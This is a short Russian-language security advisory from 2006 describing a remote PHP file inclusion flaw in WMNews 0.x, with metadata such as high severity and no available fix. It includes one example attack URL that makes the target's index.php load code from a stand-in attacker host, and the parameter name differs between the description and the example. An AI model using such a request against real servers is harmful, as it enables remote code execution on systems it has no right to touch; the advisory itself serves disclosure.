PHP-инклюдинг в WMNews

Дата публикации:
31.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
2040
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
WMNews 0.x
Уязвимые версии: WMNews 0.x

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "data_basepath" в сценарии index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

/index.php?config=1&base_datapath=http://[evilhost]

URL производителя: wartamikael.org/PHPScripts/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: WMNews Remote File Include Vulnerability

или введите имя

CAPTCHA